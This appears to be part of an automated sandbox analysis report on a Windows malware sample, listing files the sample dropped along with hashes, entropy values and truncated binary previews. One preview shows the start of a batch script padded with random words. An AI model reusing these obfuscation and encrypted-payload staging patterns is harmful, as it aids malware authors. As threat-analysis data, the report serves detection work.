                                                                                                                                                                                    Preview:L.c.U.?.Jup.J.?CY...?.?..X7.4.?..T..).?KB..0..?&D...?lU.....?.E0d...?KYC....?.:.....?@.....?..L....?#.e.m..?.-F...?.DT....?.W...?*..MU..?.z...{.?..l.Un.?.Q-..`.?>...R.?V.D..D.?oW.sg6.?U..J.(.?.>..t..?2....?.1_....?$*2....?[.....?N...)..?...V...?l$G~..?..+6..?.tF4..?...,.~.?...."n.?.<..].?|..L.?l6...;.?6*..*.?.|.59..?...:...?H.K....?s7.....?..I-...?.$z....?.9\...?..>|.~.?..-..W.?.^\sY0.?:Rp.7..?m.bzA..?G.4's..?I.y...?%...=_.?..C\.2.?.O..u..?.m.....?..M....?...n.w.?KK.'.F.?..l.^..?:.." ..?....?..}6lw.?...:.@.?.7Z8>..?$.. f..?e')lW..?zD@..[.?...jq..?.P.J...?F...<..?.Q'J.`.?x..e_..?* A...?.".Sr..?xw...N.?k..$...?..S/...?..yx|o.?P.6 d!.?.ZyrI..?.......?....*.?.T.....?...!.z.?...{...?..0.V..?.8.I.^.?..A;..?...wC..?.JG7.&.?.'..un.?...)...?m...y..?.......?..|...?,"..Q..?./...b.?PV3. 2.?..S....?.p....?V.a..".?..Tl...?Pq.j...?....Y..?.p..,.?..l"..?cY.....?.\.3&..<.-DT.!.?.\.3&....-DT.!...\.3&..<.-DT.!.@........................................................UUUUUU.3
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):97280
                                                                                                                                                                                    Entropy (8bit):7.99809174520548
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:kreVPgs+3hflsMygt7QpfHGVxX/WFzubJCwXTVMRPnqPdRRvFUjbH//pXsjXtHN8:krcPKhflbTSiX+ZukKTqRW5FUPH/hXKE
                                                                                                                                                                                    MD5:A9DEC1B7DFF28F70B61A919EE38E96EC
                                                                                                                                                                                    SHA1:A33381BE7BB5E9190737488FDFFE4DA02EDB7B81
                                                                                                                                                                                    SHA-256:6D6E2D366928B3F11932EFE280FE7B56C5B524D212017ADB01B652B19805A0B5
                                                                                                                                                                                    SHA-512:A6FAB672250CD8FDE947644466C79798B1C5F22AE52ECD8A8513ED87910F638C4D31CDEFFCFB5BBBF8F15E19618457EBF77E9A330FDA0CD16699CF88AADA91E5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..u.VMfM....f'4....DSb..>/~.....-S..A.?.H%..w..J..dEv.o.......e.o.v_^p.K......g3..<L:\....!.P.{.-..0..g+.A89.v..........r.p.qS.1.s.`.6G........j%$c.c...S......c..$..S...3.....$.QK/y...X*./>.9U.?4.o.e..n0o.....YmR..97..Ggw..:.L...a.z..D.}..z0k&..U^s7..&6.74.....:m.......6...R....}.a.z..fI..tCM.s..7..~...*...0..N....5..5p.,X..^.a....1.k.Gg....7g.....e.kHy.^.v..)...P...e....=m...%....X..7.&n...."...._N..\.;.X..a....... $L....s`O.~.q.H.".......5.a. ..u......mZT..ui...:<.yh.Wm._...?8..h..5..$H;..i|@..P.3~.*......l...a....s.d0,.P.2.g..[.\.=...[:...x.....Lq^....8.....?.=UO<.t.z*.]..3.k^.K.B?@.K........d....*.tam.)$..U.......s.b..Q..Rs,.S..3.-..)r....U8.S.0{[>.x.l!.W.)!..o_......V....Yu 7..a.r..{..]].....OY...N@...o8....I..M...........w<..[......hk[#c.._.~~..G....Q$...G.g.\...*....k1._...V.*C#i..CWB............A.M V...*.S...&.C.6Sav...).....[....~.#..4Z(.......X...,..3...q..iE...0..cY..@B]..R/.-3....K.Tb..._U...vE.+D..... .`.<..8.#......
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):147456
                                                                                                                                                                                    Entropy (8bit):6.5922681959651355
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:no2IkVvh8p65Nu+dVtqi/x4Rqf21Rgat0g/bZaUAg0FuPOKBNJ:c8JTDD/xcq21R1p/rAOPOe3
                                                                                                                                                                                    MD5:7DA0B8681866A428E968BCD6E6F27E9C
                                                                                                                                                                                    SHA1:B034C2DC64A7A65894A6B21D244E396EC5EE068D
                                                                                                                                                                                    SHA-256:4A716734B55B01E3D73FCC5B19E073E4D20011CD805FE6005B8C4B142151BA1E
                                                                                                                                                                                    SHA-512:896A27EFA8D0C5084AB96E8D209064F34D183B471466951CE82226E5B5A1C1BB6C7782B13CAC6B8C9C530A4B8F365CC85A1629EB36555D7234D364A9DE082CDC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..PW.4.....~.j.j.W....I..u...........>...u..........._.F.....3.^..]...U..E.V..@........P....I...t.j.....I.P...H.........E.....E...u..M.....3.^]...U..E........@.SV..0..W.x......v.......PV.E...P.......u..u...............j.j.j.....I......u.j.....I.P...H....b.....e....l.....5..I.t..E..E.....Ph~f..W..j..E.PW.. .I...t4....I.=3'..u.j...l...........PW.........W....I..Y....e...E.Ph~f..W..u....f....>_.F.....3.^[..]...U....SV.u...W.E......~..v..F..H......E..V..2..z......v....{...PV.E..P......ttj.j.j.....I......u.j.....I.P...H....L....Jj..E.PW....I....t..u.W....I...u..u........>.)j.....I.P...H........W....I..u.........._.F.....3.^[..]...U...$VW...M..g....E..@..0........E.P.v......u.....I...u#P....I.P...H........M.h..I.......B.@.j..0.E.P.......u.....I.P.M..=....E.P.M......M.P.Q....M......M...._3.^..]...U...0...SV.u.W...F.........V...]..J.......M...h..I..Y...j....u...S.H...............l...........PS.............F.P.h...YP.M......].j.VS.u.....I..............tm.E..x..r..
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):80896
                                                                                                                                                                                    Entropy (8bit):4.504308471119967
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:JAGWBA60iPTcf4qSq25N8EH/i6mxyyM0Dj2Bmgari07LULTN3Efr8qcDP8WBoe:Jl6JPTcUNx6/xhgariwYLTN3EfrDWye
                                                                                                                                                                                    MD5:B4B82AFFD1CC08FC2C74C9D515E4DC88
                                                                                                                                                                                    SHA1:F44F64F4F9E8128E25A2686CC6764112B8AFDAC8
                                                                                                                                                                                    SHA-256:6A249FBC4013C6CF1B12C137C4915CFB12F521E46EFA134946BA049F5C7F448A
                                                                                                                                                                                    SHA-512:492AFC9A94857C34325123BFFCD4BCB35203767028B13C305994AD01F10DAA902414C3CF7FF27EB2CB18AF8863BFA8FFFCD5A312186263521C353C2059FDC89C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:.......Wow64DisableWow64FsRedirection..Wow64RevertWow64FsRedirection....{E..zE..|E.c.C.c.C...C.c.C.c.C..{E.c.C..{E.N{E.[.C.[.C...C..C.?.C...C.c.C......[J..[J..[J...........\,I..........0.w,a..Q....m...jp5.c.d.2......y.......+L...|.~.-.....d.... .jHq...A..}......mQ.....V.l...kdz.b...e.O\...l.cc=....... n;^.iL.A`.rqg....<G..K....k......5l..B...@....l.2u\.E....Y=..0.&:..Q.Q...a....!#.V...........(..._....$....|o/.LhX..a.=-f..A.v.q... .*....q......3....x4............j.-=m..ld..\c..Qkkbal..0e.N.b...l{.......W.....eP....|......bI-...|.eL..Xa.M.Q.:t....0..A..J..=m......j.iC..n4F.g..`.s-.D...3_L...|..<q.P.A.'..... ..%.hW..o ..f...a....^...)".......=.Y....;\...l.. ..........t9G..w..&.....s..c.;d.>jm..Zjz.......'......}D......h......i]Wb..ge.q6l...knv....+.Zz...J.go....C.....`...~.....8R..O.g..gW.....?K6.H.+..L....J.6`z.A..`.U.g..n1y.iF..a...f...o%6.hR.w...G....."/&.U.;..(....Z.+.j.\....1.....,...[..d.&.c.ju..m.....?6..g.r.W...J...z..+.{8....
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):84992
                                                                                                                                                                                    Entropy (8bit):7.997641015903991
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:5NMuU3Zj5uV3ZKj6VIUjDjz8UF2jW0q0+cKsOJ2PioVM9iOy7VyLJcK76FYikG:5NMuUpj5g3ZKpU3dFoOBcKsOJERRO2V1
                                                                                                                                                                                    MD5:5AB96551C48FC54CBE6A97301C0D221A
                                                                                                                                                                                    SHA1:D29E46DD2D8C241A6F63996A98BF40116673E99F
                                                                                                                                                                                    SHA-256:2A9C1BEE4286BDE13FC014D7845E7556A4B9A591B4C41A2E66E851A921371B6A
                                                                                                                                                                                    SHA-512:D97EEE02CBF5FD2E83875DC91EC843A6E4A3868CD40BDB63F340621C136897B0AE71DC58A229104CB3111D1D004ECE7C555F96BDD5B44B3F6C11C73DB68BF8B2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:F.>O..>cp...&...<'R..%.Q)NJT.Q..*..N...b......5......f.....5~Os..<g.;WW.g.:..n.}.$....c.C..L...?..OR..>.L>.@.W.W...Q....`o.9....$.".Cbfl.^....9.\.p.mB..."YNR....8.../;y...MP5....C,<.O.!<.}..A..$......t.=.T.!D+i..X~.....uH..$.....!..A9b...e.&4.Gb..o.....l..9.B.j.^......i...`.9.&.XA....;.o7..2&.D...:......M.HE'.2.aN...Y.3.`.i......:x4.A...N*Bw.b ^.......d..n)`X.s...f.8Y..-.t.".o.*O6..N............$.}@...g4f....TqV#...@.U1.C..^K\J..y.......#O0.D.........:.H(.f......u.u.)-...OD\.F.vz.....a.!..k..q....S..>..>HX!......2K..r...=..1.f...b?..jWH..P......C.2.'..by.:.is..K.ER.".+fE...G^.>...vU.G)..x..q>........sFM.NTL.Hm......T,.........F{.Y..].e^/{bhG1.w..R.9...!..S....s......n.m..O..\.J...5....Y..Tm.).'.g..D..i...2(.r..O]./9..".<..&.?.u..n0Z....W.g.r...._;.|7f.{Z....[..^....r.M.|C.....r....u..,EZ.c._h..mw..T.W...1UK..9..]e.]..r..q..w.Z0.....-+.Y5...b...$....0. .b...w.......K...........-...D.&....,.{\..+...../1..e..A{&Gye.<V.2.k{......
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):140288
                                                                                                                                                                                    Entropy (8bit):6.739985599391929
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:UDKJtIs8di/37EM/j2xQeixApVIa0/viK:ptINsegA/12v3
                                                                                                                                                                                    MD5:C1DBC53904B26891C98270815CF7C191
                                                                                                                                                                                    SHA1:F97F8408340A9909B8BAF3F9BD668B7B0866DC89
                                                                                                                                                                                    SHA-256:53D6600F0357C8784F297D92CE9726DA41762DC8C7DC361770AF2493F289F9DD
                                                                                                                                                                                    SHA-512:AD380F8E300ADDB95F66A8F0A3032F54BA9FD120BA84ECD42045FE83B2E7787B0DB04B7529DC0297B081363E1678EF048A9BCFC166C3BFB4FBF026BFCC674838
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:........~...B.+.t.3.......M..............N...B.+.t.3........E......3........f.F.f;B........E....F.;B.........B...~.+.t.3.......M........`.....~...B.+.t.3.......M........>.....~...B.+.t.3.......M..............N...B.+.t.3........E......3.........F.;B............B.+.t.3.......M..............~...B.+.t.3.......M..............~...B.+.t.3.......M..............N...B.+.t.3........E......3...._....F.;B............B.+.t.3.......M........2.....~...B.+.t.3.......M..............~...B.+.t.3.......M..............N...B.+.t.3........E......3.........F.;B............B.+.t.3.......M..............~...B.+.t.3.......M........y.....~...B.+.t.3.......M........W.....N...B.+.t.3........E......3....1....F.;B.........B...~.+.t.3.......M..............~...B.+.t.3.......M..............~...B.+.t.3.......M..............N...B.+.t.3........E......3.........F.;B............B.+.t.3.......M........l.....~...B.+.t.3.......M........J.....~...B.+.t.3.......M........(.....N...B.+.t.3........E......3...
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):83968
                                                                                                                                                                                    Entropy (8bit):7.997873521157365
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:VKwjK9R/kCBilQDry+xT9RE7UoYEN/cTdKtRZ+fAEo6US5aGjN0mm2:VD8/bMQD+eT9CZtbtufAEoDGm2
                                                                                                                                                                                    MD5:EBA28E23F6CBD669BF0E7D62D9B9C903
                                                                                                                                                                                    SHA1:59950597B147AF6FCAC8D036899D091158E59600
                                                                                                                                                                                    SHA-256:0D3788811DB485ECD0CC3F26B6E308A21446431F6E6D5920625430AAF7427AE3
                                                                                                                                                                                    SHA-512:788B3CD12AB44B4BE4ED368486BC454F6DEA618BFCC4E0FF331796837A473448F1C0E5FCBC1CDF2F6795741AE2AC2BAC4FC9E6B124DB625151757609DD6A001B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:`..>{..G..(4%.T.N.p.N.KD..mYm...B...n@...=.M~;.3........f<n...T....}LYe+....($.;..B.k....;.v.DB...]....pN..HQx..._.....<...ru..N......xU.iC.P\b....3...@%9.....6.s..J...t.~2;#.BZ.lY..4..$_..c......N.hB......c.....-_..|.N&.M.I_[4[...s....^...O......Pe...V......s<U..X=..L.k....."6.[w.D|,.h....0G..n3s.1.......J.=.d=d.....d.V..iB.........,.......O...q..bH.s.k.0..Q.hs.....P......@....H..o...@..M..MD}}.$|6.:o...<.X...Uc5..Y....j......W.I. .....z.11....vSCb}u.U. .....5.o...m..&.MsWT.8w..?L...m.T...I..V}...5....V..B.........m.X0.8..79..E...Q\.......p.x...r.~Y.T(J..t..w?.;...0GQ...D.!...|..,.s......_.....!+n.....9....K.b..<.....Hr....p...w.....OE.i.....~Y.0...@.._..Dx.5.U..],w........im.iP.v.%..K...#fT.....i..p....'3..4.H.....A(B......zs^..D.l...O.....X.8q.....tl9...3./..D\L3....'...$....g.sG..C.P. U...5..#..../.;..#....h..y...:..w..43..2.X...*0{...E..b..DEZ...].Z..M.Mr........-..80......M.J.F.2.........G[...:8h.d$...>T@.) 9.@...i.@U#l...M
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):83968
                                                                                                                                                                                    Entropy (8bit):7.997635178608515
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:vs6hjoFQjkV6buFbfL/HmLbEwMAHDsiAIJm/EETuTadlGcz0KvaAb:vs6BoFik8SHmMMZAIJm/7ld4KvaAb
                                                                                                                                                                                    MD5:9CC714BA14F56E61A3ED55FAE950FACB
                                                                                                                                                                                    SHA1:0991BA7ADA9E3216E802DA8F0A714EF31B88962B
                                                                                                                                                                                    SHA-256:D9536B4F9AD456DDDFEE74C64F8D76E870ECEC113BD93442CA9B96F79D1E7C85
                                                                                                                                                                                    SHA-512:41B8BB7D5A0217BA7D921C7A20FE8BAC719CD3EC327D776C4FDB699C11DAE7207F53E701E7A001A0E036F018776E84A59A66E63397C88A03D83C2A9365781549
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:.6...a...B}.K.Z...C.).D;<.n..x.h.T.S..0...l.jI..J.${=6.t.>.j..q.....Q'..U..u.....sE...P....Ca.V.H=.....A...... 9.k...Du.M..NL..j.(R....a)...Y..,.iRZ.1AO..L.E.Pm1.l..Y....n...7.x~.dE.<C.9B.^e....|O.....O....[..:.....M.r....x..:.)|.O.Tb.~...vV!....*.....F.e.....Np...F.eWeU1v.[..=.......Q..:.y..[.....Pc_...Z.....`...o..[..4.D..4.._i..2.xr.].F....i..9a.O..bW.;.y......`........W....`[S[-u)....JR.,..E.4../..U..H..7#r._.....~..D6.*......v..*.$./..H ..2.?HCO..!.4n.s...z..)9Nu..x....lJ..-."...j..%9?.o....1..|.."X.g...o.iv.....bi....c..m.E)%...o......G..F.F.'..5`p<}.D.9.;..D.z=K.to.).........a.w...K.._...Q_/HI..-.8.7'..L.[.|P.....v....\...........M.}...4.k.....h.(S`...;s3{.,k..Y.....1..2w.(#.t.W6...P.}e>...*JsE..E.h.o.....cYc.*Y..."K.bB.......<...{o...'..{..m......7./..a.1eC..m@.......)......E..$....c.N..r.Z'..#ze..40UE.#..'..j.y.:.4@%.{e..G..-.P%....Y...S[_'gb.T$*.r.o...........,...B7,.P..r..2t%....A..$.&.W.....R...B_v j.<FU..c.B%|...|.>U..z...]1.1
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):88064
                                                                                                                                                                                    Entropy (8bit):7.998067564776392
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:xeseacdqcRGx6QwMr9IZG6WJfl6aVX6/FRlb9wIOz3MWzNZdfCZ7Z8MFwVf8yc4:phcRGdr9IZ7WVdX6DbQz3MWLQtBUi4
                                                                                                                                                                                    MD5:428CEB3846FCFC54773992CA87BE9D58
                                                                                                                                                                                    SHA1:5874EF76A8B4CABF84B0B92FAB6B3572161303B3
                                                                                                                                                                                    SHA-256:263586AA621C153159638CC0ABDE16EA69B54177D49DCD2181CE801ABDA8F47F
                                                                                                                                                                                    SHA-512:83E5D5BCB7BD5CCFE5E0DB83C2C582DE32D0584190C5BE2FC28B7CB3768203349197B6B725A6945EDCDB4C7098D105F24498083451C478B1124F3A626A96E96C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:r..4|.\..?>.qx.}..G...'g.Vp..7..U...m......r~......r..2D..eL.3_P.[?.r0/.. 5.dC.....!'....l..M.Ph5..........?.+..!Bz......H|fJtI7.L.I..}._.w.<B...7...Lg.J......_.?...T........eC!PRJ...7..>....]gR.~[9.f#........0Y...a...e./{-...)F* ..$...\h.(4:.D..1....Pw .O..Y.6.O......7..t..k.#.:p...Nl.@O.ja;.8....L..c....%.@}.M....0.M...`....S.y ./...tdC....5...7Wul.... ......U......L..dD.....:s.iqb4Y.r..ei{..xA".^.....`g.$.WC:..a.z..}.umJ6.W.I6........5...._.[G.gQ...2. .9.....]..."BMU.n...=FVQKn.n&...I.........K.<Em......Dy..L.....%>SCZ()...!-J..+.de...."....Z..e..PW...!.....5.!d..1.JL...L'.z;2tk.!..06...Z.[.fl.z.&.-J..*h...-L.4a&?m...z..Z.a..k..(...$p}"<7.a.s}..... ..c...4R&F..f"....g..3D]ay|.....-...\7H...?hN6.<..dHu..4!...Jd...$6o?....."....}iR3$.~P]......e..7..Y{T.....R....uL.O.2....8..I.Z.......l......d.P$.v.`...s..[.{.o.[B."...}.......J..N.....O.{[...l.}.....G.(..;9=...?....Y.[:........j.NT.....\..J B|.c....z~.?h..Xc...Dua=7.e.U...|..v).Sq<..
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):73728
                                                                                                                                                                                    Entropy (8bit):6.6226492244612505
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:Up5q/qw0j8sgyZpQ4VMEPmfP/b/psgrO4aK9iwcznrQfy0c4cDTOelOFCOBSljv5:UXqGjLPQ6ClAMfA4lelIJBSLL
                                                                                                                                                                                    MD5:8F88D37B6B4AC31A10E4E94D47DCC3AD
                                                                                                                                                                                    SHA1:289079EA4B7D0B21B10773F42362B184BB226A62
                                                                                                                                                                                    SHA-256:391400F89794853BB56EA9CEAFA66E0A429C887200372E0B727693137DA2E00C
                                                                                                                                                                                    SHA-512:5F4C0AF12A74F41A6A86D962DF45ADA9E8CBB1BD55774DDC43E4DBEF41E5CEEB126723A0DD559182E2F1701F845AAF4298DEECA3C41476813009629D41DB0565
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:D..P.D$(......|$ ........E.j).@..@...D$..W.....t..L$(.'......L$..(....L$..A...f...L$$f...>....D.D..D$$.0.`....|$ ..."....E.j).@..@...D$........t..L$(......D$0...L$.......L$..A..0.L$(.........L$..D$.P.T$......D$.YH..D...HtoH../....M.............E.3.A.H..09L$ .......E.j).H..I..g.....t..L$(.7......t$....t$.V....HY...............I....M..5.xL......E.3.A.H..09L$ ..&....E.j).@..p................j).........t..L$(......L$....L$.3.f...xL......xL.......xL....xL....t.@...xL...xL....t.......xL...xL....t.......xL...xL................xL...xL..w...3...8..rL.....D$......D$.3.A...N.9L$ ..K....E.j).H..I..$.....t..L$(......D$....D$...xL...u...........j.........D.D.M..D$..0.P....E.3.A.H..09L$ .......E.j).H..I.......t..L$(.......D$..L$........m........rt...v..........D.D.M..D$..0......E..T$..L$..@......0.D$.P.f....D$..D$(Y.L$..T$.P.O....|$$.Y..C....E.j).H..I........u*.L$.;L$.|.;L$$...T$......L$(.............L$(......T$......D.D.M..D$..0.<....E..T$..L$..@......0.D$.P.....|$$.Y.......E.
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):60416
                                                                                                                                                                                    Entropy (8bit):7.996518605218866
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:1pf+3BbLP4Qf9jvvXgRT+w32ozCLhnAEA26bgfAYH:GBJrvXc++2MCLhAkfAYH
                                                                                                                                                                                    MD5:05FDCA98CA0BD244FC684ECC696900DD
                                                                                                                                                                                    SHA1:00BEFE192DBE09FA9EB7F8D471446B87A2FA513A
                                                                                                                                                                                    SHA-256:35921BE7FEB68D8C38092EB5FD5E46E84E2A94EBA996B40B78BDFCED7156CF12
                                                                                                                                                                                    SHA-512:2601BB5F763B65E13A14802D9B04B3C85EF6C0733CA919AB026C34F570FE83D1FE714CD28160905F16B462CCDADF87E411CB1D21B40AB8D3BAF8CF2B7177ADA8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:...x..W.."..m......0#?X.o..p..J...............n[|...t..7aM.;.x...r.-..M.7.Y.......>..@.XA..y.Qa....J+...U...Z=.XG...0."o..O.UzT....OG..7;C..Jb.z..9.}..dh.L.@..[.<....+.1..!@.e..R....>....O{...c......<Ly'.-I(f..%l.......EgI.aLIJfI.D2.\.l0h.1....u..0"...y.. ...2/)O.(....v+Yga..r^dm.}..Q.. .A+og.-c..J...._.G..'B.+&....(.1\..H..q.`~..WA........l...}%..;.C!..8.h[..e.\;.L......B...I..UR..^8..Q.qa`Am0..p&.....G.j...I..=..M\....67.pt.j...[.1.].7.Wq>..T...>..+CrX....c...Bc.{.W.j3.g...gPt..R......g.p..|....[.M...K...[!.m...&-[.9#.+?.....K..f.....9'.%...g..kc..b..r.m.C.Z.qS.j.......Y.e,,..W./.....d..xp..[..j..?.D..N..HFC.c....~5>G..&...:.g..CaFM..M.}3mlEe...8.og..s..._....c.....<0.)^..8....^.y../....xx...."Z.x......M.;.$.T.X...1G.>.p..:.....?k.....@.#.:..O..M.^^faH3....`...%1....{...-....`$....U'.. ..p1<m...`y5g.+.K"8..RE........f.y.......b.....$...z-...m}h.q..m...1;.W.J...B.-.........<..i.z.9.)O......p.....L.G.:9t.....$P.*.......(`..P..kx.1.y......8.B.....
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):70656
                                                                                                                                                                                    Entropy (8bit):6.549036400348385
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:Y5oQyyk4qt1FqnLUshVkf88nfNk4qqdGYynTDYL7Q+mr9R23:Y5ouYNqnLzAfaBaGdDqeb23
                                                                                                                                                                                    MD5:AC185420E7B84BA40C727CD04F909A4C
                                                                                                                                                                                    SHA1:C8CEBB2F7C4F9FF516AC6E7585181D2795DE2D01
                                                                                                                                                                                    SHA-256:A2FADA2D4AC76FF4EE5A4E7629640F4938C417F5FEEEC32F3928E6464D38E897
                                                                                                                                                                                    SHA-512:8583C5C6EF956C8BB78ECDFCC2DA011408D754D7C27410BB801BAAC98AF3B45439676DD456553C7B27A2998CE75111F0CBC429B340DB038360C600BAC4EF6C2F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:i....T$..L$8.....L$8........L$........tSj...$\.....$\....]...Y..........$X...P.L$.........L$.......L$......{..............$X...P..$\...P."...YY....d.....$X...P....Y3.f..DZ.....$X...P....Y3.t$..t$2f..DZ.....$X....D$ ..$X....D$$.....f.D$(.D$.P.t$..t$..D$ ........I.......^[..].U.............VW.}.3.h....PWF..H.I.......h..K.P.d...YY..u..=..L.3._..^..]...U..SW....I..=.rL...........}............|.;G.s.j...|.I..=.rL..u.....3.Sh.TF..7....L.....I....L.........Sh..K.SP...rL......I.....t6....L....t....5..L.....I.SSh....W....I.....L.2..M....8SSj..5..L.....I.h......|.I..5..L...H.I...t.S.5..L.....I._3.[]...U..VW.}...?;.u..E.90u.2.....S.].;.} ..+..}...t.;.}......E.;..!...#~!..+...}...t.;.}...+..E.;.}......8.}...;.}...+...}...t.;.}.....;...... ~...+..}...t.;.}...+.;.}..7......[_^].U.. ...............S......P.....Y.............tb......P..u...$.I.......J.....Y3..E.....f..E...........E.3..E.E..E..E.E.....f.E..E.P....I.......[..].U....SV...h.K..M......Q.M...;....u.3..M.. t:..@t1...u.
                                                                                                                                                                                    Process:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1106), with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):29001
                                                                                                                                                                                    Entropy (8bit):5.079408383028201
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:FHZ2csXvUgG/aF5ZrhgS7m8PDNnAfdr5sxFHHtQhjcBkwBolAAI7:FHY7XJ8aFnlgIpPFA1r5sxBN24toa7
                                                                                                                                                                                    MD5:7AC4BC841FD3E8988A581BB6C79322DC
                                                                                                                                                                                    SHA1:278D4B086A20A240CE8EDF3B00F11DE294660E1E
                                                                                                                                                                                    SHA-256:CD10921F28566F55002A014469BE61DDEDF1BD4F2160096F6161CE13D2ED2FDB
                                                                                                                                                                                    SHA-512:7D41526753EBEB2964619C93AF984B1D3A0F926514C185C2D592A0EBFE8E42BA038A9B0A9F7A886DD0561B31292B23992F37021F398470A86F4E425F3A5B0F2A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:Set Lodging=H..fAK-Salad-Forever-Container-Anaheim-Airlines-Attention-..QPSqHimself-Prospect-Configured-Regarded-Requested-Warranty-W-..ewdCeltic-Title-Picked-Ali-Los-Running-Antique-Editor-..JpLimited-Briefing-Covered-Recall-Twenty-Dentists-Hazards-..WtLadder-Eos-Mechanics-Laundry-Fantasy-..svMFar-..Set Florists=i..XBZPetroleum-Respectively-Warming-Increased-Pike-Lite-Little-Pastor-Episode-..dEApr-Easter-Temporary-Lawn-Consists-Bear-Considering-..hpDecrease-Bangkok-Recruitment-Mario-..fTFeeding-Flyer-Leads-Formed-Beautiful-..fPjsRemoving-Burlington-Photograph-Ln-Starting-Hz-Pasta-Transparent-..bPIxOptional-Corner-Mysql-Sciences-Wheels-Nicaragua-..pSHearings-Marco-Troubleshooting-..OUfXGuide-Household-Crimes-Mom-Medicaid-Temporal-Boxed-Gui-Glossary-..Set Pos=Y..SYFaster-Immigrants-Organic-Overseas-Princess-Folks-Scientist-..VaFShows-Hazard-Arc-Surrey-Pursue-Perform-Coat-..IEnLesser-Senegal-Digit-Cleaning-..xnZBRelated-Smoking-Clinical-Nervous-..uuRely-Colleges-Vital-Owner-Elect-Unfortu
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1106), with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):29001
                                                                                                                                                                                    Entropy (8bit):5.079408383028201
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:FHZ2csXvUgG/aF5ZrhgS7m8PDNnAfdr5sxFHHtQhjcBkwBolAAI7:FHY7XJ8aFnlgIpPFA1r5sxBN24toa7
                                                                                                                                                                                    MD5:7AC4BC841FD3E8988A581BB6C79322DC
                                                                                                                                                                                    SHA1:278D4B086A20A240CE8EDF3B00F11DE294660E1E
                                                                                                                                                                                    SHA-256:CD10921F28566F55002A014469BE61DDEDF1BD4F2160096F6161CE13D2ED2FDB
                                                                                                                                                                                    SHA-512:7D41526753EBEB2964619C93AF984B1D3A0F926514C185C2D592A0EBFE8E42BA038A9B0A9F7A886DD0561B31292B23992F37021F398470A86F4E425F3A5B0F2A
                                                                                                                                                                                    Malicious:false
